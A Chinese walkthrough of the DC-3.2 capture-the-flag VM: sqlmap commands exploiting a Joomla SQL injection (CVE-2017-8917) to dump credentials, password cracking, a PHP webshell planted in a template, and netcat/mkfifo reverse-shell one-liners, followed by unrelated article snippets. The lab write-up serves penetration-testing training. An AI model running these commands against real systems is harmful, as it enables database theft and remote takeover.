DC-3.2靶机详解

news/2025/1/17 1:01:55/文章来源:https://www.cnblogs.com/gaorenyusi/p/18339907

DC-3.2

信息搜集

IP 探测

arp-scan -l
nmap -sn 192.168.179.0/24
netdiscover -r 192.168.179.0/24

目标及 ip 就为 192.168.179.134

端口探测

nmap -sT --min-rate 10000 -p- 192.168.179.134

就开放了一个 80 端口

再来个详细端口扫描和漏洞脚本扫描

nmap -sT -sV -O -p80 192.168.179.134 
nmap --script=vuln -p80 192.168.179.134

这个详细端口扫描没有什么值得注意的。

漏洞脚本扫描中值得注意的是给了个 cve,待会可以仔细看看。剩余的就是一些 dos 和 csrf 了,dos 一般不考虑,还有就是枚举的路由。

网页信息搜集

访问 80 web 服务端口

有个登录框,进行弱口令爆破,发现不行。利用 wappalzyer 插件可以看到 cms 为 joomla

去看看刚刚的 CVE-2017-8917,是个 sql 注入漏洞,可以利用 sqlmap 一把梭了。

漏洞利用

查数据库

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] --dbs
# --batch 启用批处理模式,执行时将不再要求用户进行任何交互,所有可能的提示都会使用默认选项进行处理
# -p 指定要进行注入测试的参数

查出了五个数据库,继续查 joomladb 的表

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] -D joomladb --tables

直接看可疑的 #_users 表中的段名,

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] -D joomladb -T #_users --columns

然后获取账号和密码

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" -C "username,password" --dump

密码是个 hash 密文,利用 john 进行爆破

得到密码,去进行登录一波,

没有什么东西,刚刚的枚举路径又后台路径,同样进行登录

登录后进行功能点测试。

getshell

发现一处文件修改点,把原本的 php 文件中加入一句话

但是访问路径发现没有该文件,发现网站用的是 beez3 模板,

搜索得到文件路径在路径为 /templates/beez3/,访问 http://192.168.179.134/templates/beez3/jsstrings.php

直接蚁剑连接,用户为 www-data,需要提权(不能使用蚁剑提权,因为HTTP是瞬时协议,这边正提权,那边TCP四次挥手断开连接了,不能持久连接,所以蚁剑的作用就在于上传文件来反弹shell。)

利用 nc 进行 shell 反弹

nc -e /bin/bash 192.168.179.130 2333

显示 nc 没有 -e 选项

换个其他的命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.179.130 2333>/tmp/f

反弹 shell 成功后,然后获取交互式 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

提权

先查看系统内核

uname -a

然后查看发行版本

lsb_release -a

看到 ubuntu 版本为 16.04,查找相应漏洞

看到有对应的提权漏洞。查看漏洞细节

在靶机 shell 下载 exp 文件

然后就是照着运行里面的脚本就行了,最后获得 flag

总结

cms 漏洞查询,sql 注入
john 爆破密码后台登录
后台修改文件getshell
系统内核漏洞提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/776896.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PyTorch 训练自定义功能齐全的神经网络模型的详细教程

PyTorch 是一个开源的机器学习框架,可以方便地进行神经网络模型训练和推理。本文基于 PyTorch 演示了一个非常简单但是功能齐全的神经网络训练过程,无论模型权重有多大,使用 TyTorch 训练的过程是类似的,期望本文能启到抛砖引玉的作用……在前面的文章中,老牛同学介绍了不…

【视频讲解】CatBoost、LightGBM和随机森林的海域气田开发特征分类研究

原文链接:https://tecdat.cn/?p=37208 原文出处:拓端数据部落公众号 分析师:Changlin Li 本文将通过视频讲解,展示如何用CatBoost、LightGBM和随机森林的海域气田开发特征智能分类,并结合一个python分类预测职员离职:逻辑回归、梯度提升、随机森林、XGB、CatBoost、LGB…

基于simulink的简易电机电力系统建模与仿真性能分析

1.课题概述 一个50HZ的简单电力系统如下图所示,在Simulink中建立仿真模型研究该系统的性能。发电机G采用“Synchronous Machine pu Fundamental”模型,变压器T采用“Three-Phase Transformer(Three Windings)”模型,输出线路L采用“Three-Phase Series RLC Branch”模型,负…

基于GA遗传优化的PID控制器最优控制参数整定matlab仿真

1.程序功能描述通过遗传优化算法,将PID控制器的kp,ki,kd三个参数作为遗传算法的优化变量,将PID控制器的输出误差作为遗传算法的目标值。通过迭代优化,输出控制器最优状态下对应的控制参数kp,ki,kd,即最后的参数整定结果。2.测试软件版本以及运行结果展示 MATLAB2022a版…

基于强化学习的倒立摆平衡车控制系统simulink建模与仿真

1.算法仿真效果 matlab2022a仿真结果如下(完整代码运行后无水印):2.算法涉及理论知识概要基于强化学习的倒立摆平衡车控制系统是一个典型的动态系统控制问题,它通过不断的学习和决策过程,使倒立摆维持在垂直平衡位置,即使受到外力干扰或系统内部噪声影响。强化学习在此类…

[VS Code扩展]写一个代码片段管理插件(一):介绍与界面搭建

@目录VS Code扩展机制项目搭建创建UI元素活动栏按钮主边栏视图主边栏工具栏按钮侧边栏右键菜单编辑器右键菜单项目地址[VS Code扩展]写一个代码片段管理插件(一):介绍与界面搭建 [VS Code扩展]写一个代码片段管理插件(二):功能实现写代码的时候,经常要输入重复的内容,虽…

批量登录软件,聚合登录,同时支持:小红书,快手,B站,视频号,淘宝光合,公众号一键运营管理,降本增效。

在数字化时代,我们常常需要管理多个在线账号,这不仅增加了管理的复杂性,还可能导致效率的降低。为了帮助用户简化这一过程,我们推出了六款功能强大的聚合登录软件,涵盖了小红书、快手、B站、视频号、公众号和淘宝等平台。每款软件都具备登录管理多个账号的功能,助力用户更…

2560战法+选股指标+主图

2560战法+选股指标+主图 作者: 深海游鱼 QQ:396068801 日期:2024年8月 需要指标的朋友请加QQ交流。 买点1:冲量,量价金叉 买点2:做量,即日线回踩25日均线后反弹上穿25日均线,同时五日均量线<=60日均量线 卖点3:二次金叉

数据类型之面试题

1.整数拓展 二进制在数字前输入0b 以此类推2.浮点数拓展正常来说,c1和c2输出的小数都是0.1。那么c1就应该等于c2,但是java程序最后给到的却是错误。很明显c4要大于c3,但是java程序却给到正确。 由此得出结论:浮点数是有误差的,是一种约等于,并不精确 一定不要用浮点数进行…

代码随想录Day3

203.移除链表元素 给你一个链表的头节点 head 和一个整数 val ,请你删除链表中所有满足 Node.val == val 的节点,并返回 新的头节点 。 示例 1: 输入:head = [1,2,6,3,4,5,6], val = 6 输出:[1,2,3,4,5]示例 2: 输入:head = [], val = 1 输出:[]示例 3: 输入:head = …

利用开源可视化报表工具进入流程化办公!

低代码技术平台、开源可视化报表工具优势功能特点多,是提质高效的办公利器。很多客户朋友都希望能实现流程化办公,因为只有这样才能帮助企业顺利降本、增效、提质,利用好企业内部数据资源,打破信息孤岛壁垒,实现高效发展。低代码技术平台、开源可视化报表工具优势功能特点…